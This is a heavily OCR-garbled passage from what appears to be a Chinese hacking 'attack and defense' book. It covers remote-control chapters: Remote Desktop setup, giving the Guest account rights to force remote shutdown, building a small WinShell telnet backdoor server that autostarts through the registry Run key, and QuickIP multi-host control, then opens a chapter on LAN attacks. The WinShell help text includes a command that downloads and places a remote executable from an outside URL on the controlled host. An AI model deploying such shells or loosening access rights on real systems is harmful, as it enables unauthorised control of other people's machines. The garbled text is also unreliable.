安全 组 内 的 用 户 。 





© fA 网 络 级 别 身份 验证 的 运程 桌面 的 计算 
二 安全 ) 时 ) 








STEP04: 添加 远程 果 面 用 户 STEP05: 选择 用 己 


选择 此 对 象 类 型 G) : 


用 户 或 内 置 安全 主体 
EN 


下 面 所 列 的 用 户 可 以 连接 到 这 台 计算 机 。 另 外 ,管理 员 组 中 的 任何 
ee A 


查找 位 置 F): 


4LBQD1ETPGKYS1Y 位 置 红 ) 


hdministrator 已 经 有 访问 可 。 


人 洁 和 用 上 和 让 号 桂 用 户 兴 加 国民 但 组 ， 请 污 到 “控制 面板 ”， 


输入 对 象 名 称 来 选择 示 便 ) 双 ) : 
ELE | 苦 查 名 称 C) 





单 击 “ 添 加 ”按钮 。 输入 对 象 名 称 并 单 击 “确定 ”按钮 。 





STEP06: 返回 “远程 呆 面 用 户 ” 对 话 框 STEP07: 返回 “系统 属性 ”对话 框 


下 面 所 中 的 用 户 可 以 连接 到 这 台 计 算 机 。 另 外 ， 管 理 员 组 中 的 任何 计算 机 名 系统 保护 
te hae ee 和 
远程 协助 
团 允 许 远 程 协 助演 接 这 台 计 算 机 GE) 
A 


ET 
hdministrator 已 经 有 访问 可。 


村 人 二 户 帐 户 或 将 用 户 添加 到 其 他 组 ， 请 转 到 “控制 面板 ”， 








单 击 “ 确 定 ” 按 钮 。 单 击 “确定 ”按钮 。 
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STEP08: 远程 果 面 连接 STEP09: 常规 设置 


计算 机 总 ): 示例 : computer. fabrikam. com 


计算 机 (C5): 192. 168.1.10 
用 户 名 : 未 指定 用 户 名 : Administrator 
当 您 符 接 时 将 向 您 词 问 任 据 。 


计算 机 名 称 字 段 为 空 。 请 烛 六 元 束 的 运程 计算 机 名 称 。 
站 允许 我 保存 优 据 处) 








国 选择 “开始 ”>“ 所 有 程序 " > ” 图 单 击 “ 选 “输入 IP 地 址 及 用 户 名 ， 若 要 保存 凭证 , 勾 选 “允许 
“附件 " > “远程 桌面 连接 ”菜单 命令 。 ”项 ” 按钮 。 ”我 保存 凭证 ” 复 选 框 。 


STEP10: 显示 设置 STEP11: 本 地 资源 设置 


= 。 | 旺 运 入 点 击 连 六 
远程 泉 面 


><) 





显示 配置 
为 选择 远程 桌面 的 大 小 。 将 肖 块 邱 动 双 | 最 右边 来 使 用 全 屏 BE) 。 


小 r 二 太 
1440 x 900 和 肯 妻 
_ | 将 我 的 所 有 上 监视 妖 用 于 远程 会 二 0 





应 用 得 ndows 组 合 键 区 ): 


俱 在 全 屏 显示 时 ss 


示 和 网 : 和 Lt+Tab 


本 地 设备 和 资源 
7 ”选择 您 要 在 远程 会 话 中 使 用 的 设备 和 资源 。 


| ， 选择 远程 会 话 的 颜色 深度 C)。 
 [ 戎 训 计量 Gz 位 ) 


加 打印 机 加 ) 园 草 贴 板 总) 


人 选 责 O) [连接 o | | 帮助 中 | 
设置 远程 计算 机 的 声音 及 会 话 中 使 用 的 设备 和 资源 。 





登录 远程 计算 机 的 用 户 必 须 设 置 密码 ， 否 则 将 不 能 正常 使 用 远程 琳 面 连接 


外 ， 进行 远程 果 面 连 车 接 时 远程 计算 机 用 户 将 不 能 登录 ， 若 登录 ， 则 断 
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最 [四 zr 了 
关 有 全- 攻防 从 入 门 到 精通 
会 全 对 性 


STEP12: 选择 连接 速度 STEP13: 登录 到 Windows 


输入 您 的 凭据 
这 些 凭据 梅 用 于 连接 192.168.1.10。 


思 
一 使 用 其 他 帐户 


同 记 住 我 的 凭据 








局 处 站 
Re Mb Ee 3 A ys 
同 寺 时 0 藉 :二 晤 要 瑟 


如 果 连 接 中 断 ， 则 重新 莫 接 正 ) 
© wm 





选择 远程 连接 的 速度 单 击 “ 连 接 " 按钮 。 
(建议 选择 局 域 网 ) 。 
STEP14: 登录 到 远程 计算 机 束 面 STEP15: 对 远程 桌面 进行 操作 


192.168.1.10 - 远程 桌面 连接 















































查看 远程 桌面 内 容 。 双击 “计算 机 ”图 标 ， 可 打开 “计算 机 ”窗口 。 
STEP16: 断 开 远程 束 面 连接 


在 本 地 计算 机 中 单 击 远程 桌面 连接 窗口 上 的 “关闭 


呈 ” 行 。 可 以 通过 再 次 登录 稍 后 重新 连接 到 此 会 话 。 四 


国 在 弹出 的 “远程 桌面 连接 "对话 框 中 单 击 “ 确 定 ' 
按钮 。 





13.2.2 WindoWs 系统 远程 关机 
一 般 情况 下 ， 访 问 其 他 计算 机 时 只 能 拥有 有 Guest 用 户 权 限 ， 此 时 要 执行 远程 关闭 计 








算 机 操作 ， 就 会 出 现 拒 绝 访问 的 提示 。 为 此 ， 用 户 需 要 修改 远程 计算 机 中 的 Guest 用 户 操 
作 权 限 。 
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上 其 体 的 操作 方法 如 下 。 
STEP01: 打开 “运行 "对 话 杠 STEP02: 打开 “本 地 组 策略 编辑 器 ”窗口 














引 本 地 经 策 巾 纺 名 器 [GE 
文件 (有 ”操作 (A) 。 吾 看 (V) ”帮助 (H) 
针 中 | 苗 国 |X 目 上 | 日本 
隔 本 地 计算 机 策略 a || 策略 安全 设置 
= Windows 将 根据 您 所 边 入 的 名 称 ,为 您 打开 相应 的 程序 、 a SE 备份 文件 和 所 录 Administrators,Backu.. 
一 文件 卖 、 文 栏 或 Int t 资源 ] 软件 设置 | 创建 符号 链接 Administrators 
2 rns 4 国 Windows 设 全 创建 全 局 对 象 LOCAL SERVICE,NET... 
aas 创建 一 个 信息 对 龟 
ne 创建 一 个 页 面 文件 Administrators 
, 怪 安 全 设置 创建 永久 共享 对 象 
打开 (OO); gpedit.m sd 二 帐户 策略 1 从 扩 旦 坞 上 取 下 计算 机 Administrators,Users 
4 剖 本 地 策略 从 网 阁 访 问 此 计算 机 Everyone,Administrat... | 
TS 二 从 远程 季 统 强制 关机 Administrators 
[| 管理 总 定 核 第 咯 | 
富安 让 完 项 更 改 系统 时 间 LOCAL SERVICEAdmi.… 
j 高 级 安 禾 Windoy 关闭 系统 Administrators,Users,... 
mt! 管理 器 等 管理 塞 校 和 安全 日 志 Administrators 
9 公 和 钥 生 斤 ] 还 原文 件 和 目录 Administrators,Backu... 
软件 限 症 条 略 | 加 载 和 色 载 设备 殉 动 程序 Administrators 
了 应 用 得 芒 拉 制 策 具 将 工作 站 渤 h0 纺 
电 IP 宏和 全 第 略 , 在; 拒 启 本 地 登录 *S-1-5-21-172812453... 
了 高 级 市 访 策 略 配 置 。|| 国 拒 把 从 网 络 访问 这 台 计 算 机 
| [下 上 j 甬 过 远 











选择 “开始 " > ” 国 输 和 “gpeditmsc" 命令 ” 国 展开 至 “用 户 权利 分 配 ” 国 双击 “从 远程 系统 强 
“运行 ”菜单 命令 。 ”后 单 击 “ 确 定 ” 按 钮 。 节点 。 制 关 机 ”选项 。 


STEP03: 添加 Guest 用 户 STEP04: 输入 "cmd" 命 令 


从 远 得 系统 强制 关 宙 层 性 


SP | So 
Td 本 Windows 将 根据 您 所 输入 的 名 称 ， 为 您 打开 框 应 的 程序 、 
车 | 从 远程 系统 强制 天 机 一 文件 去 、 文 栏 或 Internet 资源 。 








打开 (QO): cmd 
瑟 “使 用 管理 权限 创建 此 任务 ， 











师 除 @) 
| 确定 | 








将 Guest 用 户 添加 到 用 户 或 组 列表 框 中 。 在 文本 框 中 输入 国 单 击 “ 确 定 ”按钮 。 


“cmd’” 命令 。 


STEP05: 打开 “命令 提示 符 ” 窗 口 


国 管理 员 : C\Windows\system32\cmd.exe 


Microsoft Windows [hh 本 6.1.?681] 
ha 术 BF 有 ce 2069 Microsoft Corporation - 避 嫩 四 用 有 权 刊 | 。 


CNMUsehsnhduministhatoh>cd\ 输入 “shutdown -S-mAN 远 程 计 算 机 名 -tt 30 i 
GC“~>shutdown —s —m vpc -tt 38 其 中 30 为 关闭 延迟 时 间 。 





被 关闭 的 计算 机 屏幕 上 将 显示 “系统 关机 ”对 话 框 ， 可 输入 “shutdown -a” 命 令 终止 
关机 任务 。 


13.2.3” ”区别 远 程 果 面 与 远程 协助 


“远程 协助 ”是 Windows 附 市 的 一 种 远程 控制 方法 。 远 程 协 助 的 发 起 者 通过 MSN 
Messenger (或 Windows Messenger) 问 Messenger 中 的 联系 人 发 出 协助 要 求 ， 在 获得 对 方 


20°| 





= 一 > 
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同意 后 ， 即 可 进行 远程 协助 。 远 程 协助 中 被 协助 方 计算 机 将 暂时 受 协助 方 (在 远程 协助 程 
序 中 被 称 为 “专家 ”) 的 控制 ， 专 家 可 在 被 控 计 算 机 中 进行 系统 维护 、 安 装 软件 、 处 理 计算 
机 中 的 某 些 问题 或 癌 被 协助 者 演示 某 些 操作 。 

使 用 “远程 协助 ”时 还 可 以 通过 回 邀 请 方 发 送 电子 邮件 等 方式 进行 ， 且 通过 “帮助 和 
支持 ”窗口 查看 双方 的 有 关 资 料 。 使 用 “远程 协助 ”进行 远程 控制 必须 由 主 控 双 方 协同 才 
能 够 进行 ， 所 以 Windows 7 中 义 提 供 了 “远程 加 面 连接 ”控制 方式 。 

利用 “远程 困 面 连接 ”功能 ， 用 户 可 在 远离 办 公 室 的 地 方 通 过 网 络 对 计算 机 进行 
远程 控制 ， 即 使 主机 处 于 无 人 状态 ,“ 远 程 果 面 连接 ”仍然 可 以 顺利 进行 。 远 程 用 户 可 
通过 这 种 方式 使 用 计算 机 中 的 数据 、 应 用 程序 和 网 络 资源 ， 也 可 让 同事 访问 自己 的 计 
算 机 票面 ， 以 便 协 同 工 作 。 使 用 “远程 昌 面 连接 ”功能 时 ， 补 欣 计 算 机 用 户 不 能 使 用 
目 己 的 计算 机 ， 不 能 看 到 远程 操作 者 所 进行 的 操作 过 程 ， 且 远程 控制 者 具有 被 探 计算 
机 的 最 高 权限 。 




































































13.3 用 WinShell 实现 远程 控制 


WinShell 是 一 个 运行 在 Windows 平台 上 的 Telnet 服务 器 软件 ， 主 程序 是 一 个 仅仅 6kB 
大 小 的 可 执行 文件 ， 可 完全 独立 执行 而 不 依赖 于 任何 系统 动态 链接 库 ， 它 尽管 体积 很 小 ， 
却 功能 强大 。WinShell 文 持 定制 并 口 、 密 公 保 护 、 多 用 户 登 录 、NT 服务 方式 、 远 程 文件 下 
载 、 信 息 上 自 定 义 及 独特 的 反 DDoS 等 功能 














13.3.1 配置 Winshell 


默认 状态 下 ， 和 定制 WinShell 的 主 程序 会 生成 一 个 压缩 过 的 体积 很 小 的 WinShell 
服务 端 ， 当 然 也 可 以 选择 不 压缩 ， 使 用 其 他 压缩 或 保护 程序 对 生成 的 WinShell 服务 





疹 进 行 处 理 。 
具体 操作 步骤 如 下 。 
STEP01: 安装 并 运行 WinShell 
mde 二 二 设置 即将 生成 的 服务 器 端的 端口 号 ( 默认 为 
窗口 了 本 i 
一 一 加 。 5277 ) 和 登录 密码 ( 默认 为 空 )。 
故 听 端口 :连接 密码 :te) 贺 限 ， oe 
S277 和 
放下 梧 作息， ogg 采用 默认 的 启动 服务 名 、 服务 列表 名 和 服务 描 
| www. hnsy3088. com - 术 
一 第 二 步 | | 太一 于 二 Ke 
局 动 服务 名 字 -: 服务 列表 名 字 OD 注册 表 和 启动 名 字 : (16) 
Winshell Winshell Servi Winshell Nl Ns 三 2 :人 天 | 
| 要 设置 注册 表 启 动 名 字 ， 上 默认 为 WinShell。 
Provide Windows Shell Service HIN. .. ‘Run\ReekeyHame 
全 EE Rr py 星 否 E i 人 二 > N [4 —. ~ )y 、 
下 载 文件 地 ts。 (0) EN 站 自作 公 选 “是 否 自动 安装 ” 复 选 框 。 


[ 是 否 自 动 安 装 


Ti 人 让 站 IY 是 百 让 窗口 权限 自动 加 过 





单 击 “ 生 成 ”按钮 
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1 ) “连接 密码 返回 信息 


远程 控制 技术 


是 指 登 录 WinShell 时 要 求 输入 密码 的 提示 信息 ， 


默认 为 “Password:”， 可 设置 为 空 ， 即 无 提示 信息 ， 
2 )“ 注 册 表 启动 名 字 ” 是 指 在 安装 WinShell 时 ， 为 了 在 系统 启动 后 能 自动 


运行 ，WinShell 在 注册 表 路 径 HKEY LOCAL MACHINE\ SOFTWARER\ 
Microsoft\\Windows\ CurrentVersion\Run 处 的 字符 串 名 ， 默 认为 WinShell， 其 值 
也 为 字符 串 类 型 ， 如 “Ci:\windows\ winshell.exe>”。 





STEP02: 查看 生成 的 服务 器 端的 配置 信息 


了 server.exe.txt - 记事 本 
文件 ( ”编辑 (E) ” 相 z(D) “ 章 看 (V) 帮助 (H) 


E:\ 黑 客 资料 
12832 Bytes 


WinShell Server Path : 
\WinShell50\server. exe 
WinShell Server Size : 


= [L5277] 
[0] 


: [Password:] 

: [WinShel1] 

: [WinShel1] 

: [WinShell Service] 
Service Description : [Provide Windows Shell 
lService 











lIDestination Filename : 
Autolnstall Flag E 三 


- 














从 弹出 的 文本 文件 中 可 以 看 到 生成 的 服务 器 端的 配 


置 信 息 © 


STEP04: 查看 WinShell 进程 


i 加 Windows 任务 管理 器 
训 忻 (F) ”选项 (OQ) 前 春 (V) 帮助 (H) 


性 能 
映像 名 称 


dServer. exe 


内 存 ( .. 描述 
2,908 Kk QuickIP... 


1, 704 到 小 新 日 ... 
16,Bl2 KE Microso... 


riliqguicke... 

SearchInde.. 

SearchProt.. 
2,256 玉 ”服务 和 ... = 
1, 468 KE SCcImecum. . 

88 KEK Windows.. 

10, 736 KK 360 软件... 
4,008 ”搜狗 输 ... 
1,756 KK 后 台 处 . . 

1,580 KEK Windows... 
2,B20 及 Windows... 
5,956 KEK Windows... 


nD COO _ Vv 山 - 一 了- 一 


进程 数 : 75 CPU 重用 率 ; 596 贱 理 内 存 : 5796 


SeErVvices. exe 
SGImeGuard... 
SmsS。eXe 

SoftMerLit... 
SogouCloud.. 


spool] sw. exe 


svehost. exe 
svehost. exe 


svechost. exe 


一 一 -一 下 一 上 


显示 所 有 用 户 的 进程 G) 








STEP03: 查看 生成 的 WinShell 服务 端 信息 


十 1 server.exe 层 性 


兼容 性 | 安全 “| 详细 信息 | 以 前 的 版 本 


互 钻 半 六 局 T ， 皇 其 所 








文件 类 型 : 
描述 : 


应 用 程序 【 exe) 


SEYVYELY. EXE 


位 置 : 
太 小 : 
占用 空间 : 


FE: 里 客 资 料 负 inshel1150 
12.5 到 (12,832 字 节 ) 
16.0 I 霹 (16, 384 字 节 ) 





发 现 服务 器 闫 程序 大 小 只 有 12.5KB。 


设计 WinShell 是 的 初衷 做 一 个 非常 小 巧 、 方 便 的 
Telnet 服 务 器 软件 , 而 不 是 木马 程序 , 所 以 WinShell 
的 进程 并 没有 被 隐藏 。 
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STEP05: 连接 远程 计算 机 STEP06: 输入 密码 


管理 员 ; CANWindows\system32\cmd,exe EE Telnet 192.168.59, 128 


Microsoft Windows [hh 本 6.1.7688] | . 
版 权 所 有 “cy 2999 Microsoft Corporation。 保 留 所 有 槐 利 。 Welcome to Microsoft Telnet Service 


CcC:\UsersvJohn2cd\ login: hacker 
password : 村 村 
CN>telnet 192.168.59.128 





执行 命令 格式 “telnet 服务 器 IP 5277”"， 然 后 按 ”输入 用 户 名 后 按 《Enter〉 键 ， 然 后 输入 正确 的 密 
(Enter》 键 。 码 并 按 《Enter》 键 。 


STEP07: ”成功 登录 远程 计算 机 STEP08: 查看 显示 的 反馈 信息 





| chinese txt - 记 训 本 
EN Telnet 192.168.59.128 文件 “篇 得 E)， 格式 (O) 坦 看 (V) 帮助 (H) 


WinSheil v5.8 (5C)2062 janker .org 








? for help 

鸡 迎 使 用 Microsoft Telnet Client . 2 
i Install 远程 安装 功能 当 你 仅仅 执行 星 nshel 而 没有 安装 winshel1 的 时 候 ) 
r Renove 。 《 运 楂 及 妆 装 功能 注意 此 命令 并 不 终止 winsheii 的 运行 ) 
p Path winshell 主 程序 的 路 径 信息 7 
b reBoot 新 启动 机 器 ) 
d shutDown 关闭 机 总 ) 
s Shell 要 作 挟 你 对 会 看 到 可 爱 的 “C:\> ? ne 
x exit 浇 出 本 次 登录 会 证 诗 汪 夺 命 多 并 不 人 
q Quit 经 上 Winsnell 负 进行 行 ， 注 意 此 命令 并 安装 winshe 
Download : 
CHD>http://.-./srv.exe 《通过 http 下 载 其 他 网 站 上 的 文件 到 运行 winshell 的 机 器 上 ) 
学 便 ， 
1. CHD>p 


C:\winnt\winshell .exe 
2. CMD>http://ww.janker .org/hello.exe 
Download to C:\winnt\hello.exe... 


3. CHD»sS 
Microsoft Windows 2096 [Version 5.99.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 





C:\WINNT\> 








此 界面 就 是 远程 主机 为 Telnet 终 端 用 户 打 开 的 命令 ”在 命令 行 中 输入 “?” 并 按 〈 Enter〉 键 查看 可 以 操 
提示 符 窗口 ， 在 该 窗口 中 输入 的 命令 将 会 直接 在 远 作 的 命令 ， 通过 反馈 信息 得 知 可 以 使 用 哪些 命令 。 
程 计算 机 上 执行 。 


13.3.2 ”实现 远程 控制 


当 配 置 好 WinShell 服务 占 并 在 被 控 靖 计算 机 中 运行 后 ， 用 户 可 在 主 控 问 计 算 机 中 利用 
“命令 提示 符 ” 窗 口 输入 有 关 的 Telnet 命令 与 远程 计算 机 建立 连接 ， 并 进行 控制 。 
其 体 的 操作 方法 如 下 。 
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STEP01: 成 功 建立 连接 STEP02: 执行 “? ”命令 


CE ISINSE EPE MI ES 





| = 
本 Telnet 192.168.0.16 


vu5.8 C2002 janker -okFc 


inShell v5.8 <C22002 janker.org 











将 已 配置 的 WinShell 服务 器 端 复制 到 远程 计算 机 可 查看 WinShell 的 所 有 命令 参数 。 
中 并 运行 。 在 主 控 端 运行 “Telnet 服务 器 IP 5277” 
命令 。 
WinShell 4 WS 能 如 下 。 
i Install: 远程 区 Qe 
r Remove: 远程 反 安 装 功 能 。 此 命 Re 义 止 WinShell 的 运行 。 
p Path: 查看 WinShell 主 程 序 的 路 径 信息 
b reBoot: 重新 尼 动 远程 计算 机 。 
d shutdown: 关闭 远程 计算 机 。 
s Shell: WinShell 提供 的 Telnet 服务 功能 。 
x exit; 退出 本 次 登录 会 话 。 此 命令 不 化 《上 WinShell 的 运行 。 
q quit: 终止 WinShell 的 运行 。 此 命令 不 反 安装 WinShell. 





STEP03: 执行 “s” 命 令 


| -= 
EB Telnet 192.168.0.16 





显示 远程 计算 机 的 盘 符 信 息 。 此 时 主 控 痕 就 可 以 控 
A 制 远程 计算 机 了 。 


icrosoft Corp. 











13.4 ”用 QuicklP 进行 多 点 控制 


如 果 想 尝试 一 下 “一 台 计 算 机 同时 管理 和 控制 多 台 计 算 机 ， 多 台 计 算 机 也 同时 管 ee 
算 机 ”这 样 的 “多 点 ”控制 ，QuickIP 无 疑 是 一 个 很 好 的 选择 。QuickIP 可 用 于 服务 器 管 
时 资源 共享 、 网 吧 机 器 管理 、 远 程 办 公 、 远 程 教 育 、 排 除 故 障 、 远 程 监控 等 多 种 应 ， 


13.4.1 设置 Quick 卫 服务 器 端 
由 于 QuickIP 是 将 服务 器 端 与 客户 端 合 并 在 一 起 的 ， 因 此 无 论 在 哪 台 计算 机 中 都 是 一 起 安 




















285 





合 人 他 他 





SS》> 
攻防 从 入 门 到 精通 








装 服 务 器 中 和 客户 关 ， 这 也 是 实现 一 全 服务 需 可 以 同时 被 多 个 客户 机 控制 、 


一 台 客 尸 机 也 可 以 


同时 控制 多 个 服务 器 的 前 提 条 件 。 配 置 QuickIP 服务 器 端的 具体 操作 步骤 曝光 如 下 。 


STEP01: 运行 QuicklP 服务 器 


记 安装 - QuickIP 
安装 程序 已 经 将 QuicklP 安装 到 您 的 机 器 。 您 可 以 选择 运 
行 安装 的 程序 。 


请 点 击 充 成 -退出 云 装 程序 。 

















单 击 “ 完 成 ” 
按钮 继续 。 


勾 选 “立即 运行 QuicklP 
服务 器 ” 复 选 框 。 
STEP03: 修改 密码 
籽 修改 本 地 服务 器 的 密码 
a 
党 修改 本 地 服务 器 密码 
请 输入 旧 密 码 


重 输 新 密码 |#x* 





但 码 区 分 大 小 写 
取消 


团 根 据 提示 输入 密码 并 单 击 辆 单 击 “确定 ”按钮 。 


按钮 。 


13.4.2 设置 QuicklP 宫 户 痛 





客户 端的 设置 与 服务 器 端的 设置 相 比 简单 多 了 ， 主 要 是 添加 服务 器 端 


操作 步骤 如 下 。 
STEP01: 添加 服务 器 


QuickIP 客户 机 
| 注册 软件 “文件 “工具 “信息 ”帮助 


昌 X 拘 器 从 0 奴 

添加 主机 | 取消 ”主机 列表 扫 指 主机 屏幕 控制 网 络 电话 主机 信息 ”村 置 ”本 地 录音 录 秀 回放 寻 | 
霓 | 选择 主机 |1270017314 ”| 钢 要 QuickIP 

| 电动 | 运程 控制 信 理 器 
| 我 的 电脑 
远程 主机 





ee Et 油 
机 可 避 3 Email 
王 《 








加 单 击 “添加 主机 


按钮 , 准备 添加 服务 地 址 、 疾 口 及 密码 后 , 单 击 
Ws “确认 ”按钮 。 
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输入 远程 计算 机 的 IP 


STEP02: 设置 登录 密码 提示 信息 





单 击 “ 确 定 ” 按 钮 。 


STEP04: ”QuicklP 的 服务 器 管理 窗口 


几 QuickiP 版 务 比 官 理 


QuieckIP 服务 器 


服务 器 状态 : 正 运 行 接收 : 发 送 :0 
服务 器 信息 : 4L8QD1ETPGHVS51IY [192. 168. 1.10:7314 192. 168.160.1:7314 


连接 的 客户 机 : 0 服务 器 日 志 : 














可 以 看 到 “服务 器 启动 成 功 ” 的 字样 。 





前 的 操作 。 有 基体 的 


STEP02: 查看 已 添加 的 IP 地 址 


冰 QuickiP 客户 机 
注册 软件 文件 工具 信息 帮助 





次 的 国 家 ?| 其 问 E 
| 添加 主机 列表 扫描 主机 屏幕 控制 网 络 电 话 主机 信息 息 配置 ”本 地 录音 | 
过 选择 主机 [192.1680.17314 "| 向 过 QuickIP 


违 程 主机 的 服务 列表 (for Windows 20007NTAXP only) 
志 程 主机 的 工作 站 列表 (for Windows 20007NTAXP only) 
访问 远程 主机 的 主页 


一 田 - 田 - 田 汪汪 














|192. 168.0.1:7314 项 数 =8 





展开 已 添加 的 IP 地 址 ， 可 看 到 远程 控制 功能 十 分 丰 
这 表示 客户 端 与 服务 器 端的 连接 已 经 成 功 了 。 


< 第 13 章 





远程 控制 技术 


13. 和 3 实现 远程 控制 


下 面 介 绍 如 何 进 行 远 程控 制 〈 鉴 于 QuickIP 的 功能 非常 强大 ， 这 里 只 讲 几 个 比较 常用 
的 控制 操作 )， 有 具体 操作 步骤 如 下 。 
STEP01: 查看 远程 驱动 器 STEP02: 远程 屏幕 控制 


风 QuickiP 宪 户 机 好 QuickiP 客户 机 
一 一 文件 工具 信息 帮助 注册 软件 文件 工具 信息 帮助 











a et | a 全 的 g | + 加 
添加 主机 。” 取消 主机 列表 扫描 主机 屏幕 控制 网 络 电话 主机 信息 | 配器 。 本 地 录音 好 要 辐 添加 主机 。 取 主机 列表 扫 所 主机 屏幕 控制 网 络 电话 | 主机 信息 。 配置 ”本 地 录音 孙 人 四 如 
次 选择 主机 [192168017314 | 外 GG QuickIp 次 迁 捍 主机 [881034 可 外 二 QuickIP | 


Pb 2 6 国 il 
“ 馈 远程 主 由 - 剧 我 的 电脑 
已 -各 运程 主机 


由 - 气 国 127.0.0.1:7314 
192. 168. 0. 1:7314 


127.0.0.1:7314 


i 地 192. 168. 1.0:7314 
机 远程 磁盘 驱动 器 

















ET 
单 击 “ 远 程 磁盘 驱动 器 ”选项 ， 即 可 看 到 远程 计算 ” 单 击 “ 屏 幕 控制 选项 ， 稍 后 便 可 看 到 远程 计算 机 
机 中 的 所 有 驱动 器 。 桌面 ， 并 且 可 实现 对 远程 计算 机 的 控制 。 








如 果 远 程 计 算 机 出 现 速 度 忽 然 缓 慢 等 情 况 ， 则 可 以 通过 单 击 “ 远 程 主机 进 
程 列表 ”选项 ， 查 看 远程 计算 机 进程 来 快速 诊断 远程 计算 机 的 问题 所 在 。 


提示 





STEP03: 关闭 远程 计算 机 


F Quickip 套 户 机 
注册 软件 文件 工具 ”信息 帮助 - 一 
县 x 二 [ 加 fk 9 起 GD "em [| 
添加 主机 。 取消 。 主机 列表 扫描 主机 屏幕 控制 网 络 电话 主机 信息 。 配置 。 本 地 录音 录像 回族 。 帮 
雪 ”选择 主机 [192168.107314 ”| 加 二 QuickIP 
四 "总 远程 磁盘 红 动 器 ol 
日 : 男 远程 控制 
”加 屏幕 控制 
电话 
| -二 远程 主机 信息 
一 息 声音 控制 


[ | -一 一 | 单 击 , i 的 “远程 关机 ”选项 ， 弹 出 对 
”一 使 远程 服务 器 程序 开机 自动 运行 
! | X 取消 远程 服务 器 程序 的 开机 自动 运行 


可 打开 远程 机 的 服务 器 管理 窗口 
Ort | 


限于 篇 幅 ， 本 书 无 法 将 该 软件 的 远程 控制 功能 一 一 详细 讲述 ， 但 从 上 述 的 远程 控制 应 
用 可 以 看 出 ，QuickIP 远程 控制 功能 十 分 强大 ， 是 网 管 和 有 远程 控制 需求 用 户 的 好 帮手 。 
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局 域 网 攻防 


目前 ， 黑 客 利 用 各 种 专门 攻击 局 域 网 的 工具 对 局 域 网 进行 攻击 ， 鉴 于 此 ， 
本 章 曝 光 最 常用 的 一 些 局 域 网 黑客 工具 ， 读 者 可 以 详细 了 解 这 些 工具 以 及 相关 


的 安全 防范 知识 。 


O 〇 上 局域网 安全 隐患 
O 〇 上 局域网 攻击 工具 曝光 
O 〇 局域网 监控 工具 曝光 





< 第 14 章 
局 域 网 攻防 


14.1 局 域 网 安全 介绍 
目前 ， 越 来 越 多 的 企业 建立 自己 的 局 域 网 (Local Area Network，LAN) 以 实现 企业 信 
县 资源 共享 或 者 在 局 域 网 上 运行 各 类 业务 系统 。 随 着 企业 局 域 网 应 用 范围 的 扩大 、 保 存 和 
传输 的 关键 数据 增多 ， 局 域 网 的 安全 性 问题 日 益 突 出 。 

















14.f1 局 域 网 基础 知识 


局 域 网 是 指 在 某 一 区 域内 由 多 台 计 算 机 互 连 形 成 的 计算 机 组 ， 一 般 是 方圆 几 千 米 以 内 
的 计算 机 。 局 域 网 把 个 人 计算 机 、 工 作 站 和 服务 器 连 在 一 起 ， 在 局 域 网 中 可 以 进行 管理 文 
件 、 共 享 应 用 软件 、 共 享 打 印 机 、 安 排 工作 组 内 的 有 日程、 发 送 电子 邮件 和 传真 通信 服务 等 
操作 。 局 域 网 是 封闭 型 的 ， 可 以 由 办 公 室 内 的 两 台 计 算 机 组 成 ， 也 可 以 由 一 个 公司 内 的 数 

台 计 算 机 组 成 。 由 于 距离 较 近 ， 传 输 速 率 较 快 ， 从 10Mbit/s 到 1000Mbit/s 不 等 。 局 域 网 
第 见 的 分 类 方法 有 以 下 几 种 。 

1) 按 采 用 技术 分 ， 可 分 为 以 太 网 (Ether Net)、FDDI 网 和 令 肚 环 (Token Ring) 
网 等 。 

2) 按 连 网 的 主机 间 的 关系 分 ， 可 分 为 两 类 : 对 等 网 和 C/S( 客 户 / 服 务 器 〉 网 。 

3) 按 使 用 的 操作 系统 分 ， 可 分 为 Windows 网 和 Novell 网 等 。 

4) 按 使 用 的 传输 介质 分 ， 可 分 为 细 缆 《〈 同 轴 ) 网 、 双 丝线 网 和 光纤 网 等 。 

局 域 网 最 主要 的 特点 是 : 网 络 为 一 个 单位 所 拥有 ， 且 地 理 苑 围 和 站 点 数目 均 有 限 。 局 
域 网 具有 如 下 的 一 些 主要 优点 。 

1) 网 内 主机 主要 为 个 人 计算 机 ， 是 专门 适 于 微机 的 网 络 系统 。 

2) 履 盖 范围 较 小 ， 一 般 在 几 公里 之 内 ， 适 于 单位 内 部 连 网 。 

3) 传输 速率 高 ， 误 码 率 低 ， 可 采用 较 低 廉 的 传输 介质 。 

4) 系统 扩展 和 使 用 方便 ， 可 共享 昂 贯 的 外 部 设备 和 软件 、 数 据 。 

5) 可 靠 性 较 高 ， 适 于 数据 处 理 和 办 公 目 动 化 。 

局 域 网 连 网 非常 灵活 ， 两 台 计 算 机 就 可 以 连 成 一 个 局 域 网 。 局 域 网 的 安全 是 内 部 网 络 
安全 的 关键 ， 如 何 保 证 局 域 网 的 安全 性 成 为 网 络 安全 研究 的 一 个 重点 。 
























































14.f2 局 域 网 安全 隐患 


网 络 使 用 户 以 最 快 的 速度 获取 信息 ， 但 是 非 公 开 性 信息 的 被 盗用 和 破坏 ， 是 目前 局 域 
网 面临 的 主要 问题 。 

1. 局域网 病毒 

在 局 域 网 中 ， 网 络 病毒 除了 有 具有 可 传播 性 、 可 执行 性 、 破 坏 性 、 隐 蔽 性 等 计算 机 病毒 
的 共同 特点 外 ， 还 具有 如 下 几 个 新 特点 。 

1 ) 传染 速度 快 。 在 局 域 网 中 ， 由 于 通过 服务 器 连接 每 一 台 计 算 机 ， 这 不 仅 给 病毒 传播 
提供 了 有 效 的 通道 ， 而 且 病 毒 传播 速度 很 快 。 在 正常 情况 下 ， 只 要 网 络 中 有 一 台 计 算 机 存 
在 病毒 ， 在 很 短 的 时 间 内 ， 将 会 导致 局 域 网 内 计算 机 相互 感染 。 
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2) 对 网 络 人 破坏 程度 大 。 如 果 局 域 网 感染 病毒 ， 将 直接 影响 到 整个 网 络 系统 的 工作 ， 轻 
则 降低 速度 ， 重 则 破坏 服务 器 上 重要 的 数据 信息 ， 甚 至 导致 整个 网 络 系统 朋 溃 。 

3) 病毒 不 易 清 除 。 清 除 局 域 网 中 的 计算 机 病毒 ， 要 比 清 除 单机 病毒 复杂 得 多 。 局 
域 网 中 只 要 有 一 台 计 算 机 未 能 完全 清除 病毒 ， 就 可 能 使 整个 网 络 重新 被 病毒 感染 ， 即 
使 刚刚 完成 清除 工作 的 计算 机 ， 也 很 有 可 能 立即 被 局 域 网 中 的 另 一 台 带 病毒 计算 机 所 

2. ARP 攻击 

ARP 攻击 主要 存在 于 局 域 网 网 络 中 ， 对 网 络 安全 和 危害 极 大 。ARP 攻击 就 是 通过 伪造 的 
